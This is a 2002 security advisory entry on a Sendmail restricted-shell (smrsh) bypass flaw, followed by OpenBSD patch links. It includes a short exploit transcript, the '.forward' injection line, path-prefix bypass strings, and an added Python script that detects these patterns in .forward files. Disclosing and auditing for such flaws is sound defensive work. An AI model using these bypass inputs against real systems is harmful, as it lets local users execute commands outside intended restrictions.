SecurityTracker.com
Category:   Application (E-mail Server)  >   Smrsh
Vendors:   Sendmail Consortium
(OpenBSD Issues Fix) Re: Sendmail Restricted Shell (smrsh) May Let Local Users Bypass Restrictions to Execute Code
SecurityTracker Alert ID:  1005554
SecurityTracker URL:  http://securitytracker.com/id/1005554
CVE Reference:   CVE-2002-1165
Date:  Nov 7 2002
Impact:   Execution of arbitrary code via local system, User access via local system
Fix Available:  Yes
Vendor Confirmed:  Yes

Description:   A vulnerability was reported in the Sendmail restricted shell (smrsh) utility. A local user may be able to bypass smrsh access restrictions and execute a user-specified binary on the system.

iDEFENSE reported that a local user can insert a special character sequence into their '.forward' file to exploit the flaw.

One method is to insert the '||' string, as shown in the demonstration exploit transcript below:

$ echo "echo unauthorized execute" > /tmp/unauth
$ smrsh -c ". || . /tmp/unauth || ."
/bin/sh: /etc/smrsh/.: is a directory
unauthorized execute

According to the report, smrsh will verify that the '.' exists but does not perform verification on files listed after the '||' string, so /tmp/unauth is executed even though it is not located within the '/etc/smrsh' restricted directory. To exploit this, the local user can place the following line in the '.forward' file:

"| . \|| . /tmp/unauth \|| ."

Another method is to provide a command line to smrsh that will be internally converted to a space, thereby bypassing all access filters. Some examples include:

smrsh -c "/ command"
smrsh -c "../ command"
smrsh -c "./ command"
smrsh -c "././ command"
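
For administrators who want to check existing '.forward' files for the two patterns described above, the following is an added example and is not part of the original advisory or of smrsh. The regular expressions, function names and finding labels are assumptions chosen for illustration, and the sample '.forward' content is constructed (it reuses the '/tmp/unauth' line quoted in the advisory).

```python
import re

# Pipe-to-program entry in a .forward file: optional quote, a single "|", the command.
PIPE_ENTRY = re.compile(r'^\s*"?\s*\|(?!\|)\s*(?P<cmd>.*?)"?\s*$')
# Command whose first word is built only from ".", ".." and "/" and ends in "/",
# followed by whitespace: "/ x", "../ x", "./ x", "././ x" (the advisory's examples).
PATH_ONLY_PREFIX = re.compile(r'^(?:\.{0,2}/)+\s')


def audit_forward_line(line):
    """Return findings for one .forward line; an empty list means nothing flagged."""
    match = PIPE_ENTRY.match(line)
    if not match:
        return []  # plain address or file delivery, not a program entry
    # Undo backslash escaping such as \|| before inspecting the command.
    cmd = match.group("cmd").replace("\\", "")
    findings = []
    if "||" in cmd:
        findings.append("or-list")  # commands chained with '||'
    if PATH_ONLY_PREFIX.match(cmd):
        findings.append("path-only-prefix")  # leading "/", "../", "./", ...
    return findings


def audit_forward_text(text):
    """Map 1-based line numbers to findings for every flagged line."""
    results = {}
    for number, line in enumerate(text.splitlines(), 1):
        findings = audit_forward_line(line)
        if findings:
            results[number] = findings
    return results


# Constructed sample .forward content (assumption, for demonstration only).
SAMPLE = r'''alice@example.com
"|vacation alice"
"| . \|| . /tmp/unauth \|| ."
"|./ command"
'''

if __name__ == "__main__":
    for number, findings in audit_forward_text(SAMPLE).items():
        print(f"line {number}: {', '.join(findings)}")
```

A flagged line is a lead for manual review, not proof of misuse; applying the vendor patch listed under Solution remains the fix.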

iDEFENSE credits zen-parse and Pedram Amini with reporting this flaw.

Impact:   A local user can bypass smrsh restrictions and execute arbitrary commands on the system.
Solution:   OpenBSD has issued the following fixes:

ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.2/common/003_smrsh.patch

ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.1/common/017_smrsh.patch

ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.0/common/034_smrsh.patch

Vendor URL:  www.sendmail.org/
Cause:   Access control error, Input validation error, State error
Underlying OS:  UNIX (OpenBSD)
Underlying OS Comments:  OpenBSD 3.0, 3.1, 3.2

Message History:   This archive entry is a follow-up to the message listed below.
Oct 1 2002 Sendmail Restricted Shell (smrsh) May Let Local Users Bypass Restrictions to Execute Code



 Source Message Contents

Subject:  OpenBSD smrsh bug


SECURITY FIX: November 6, 2002

An attacker can bypass the restrictions imposed by sendmail's restricted shell, smrsh(8),
and execute arbitrary commands with the privileges of his own account.
A source code patch exists which remedies the problem:

ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.2/common/003_smrsh.patch

ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.1/common/017_smrsh.patch

ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.0/common/034_smrsh.patch


 
 

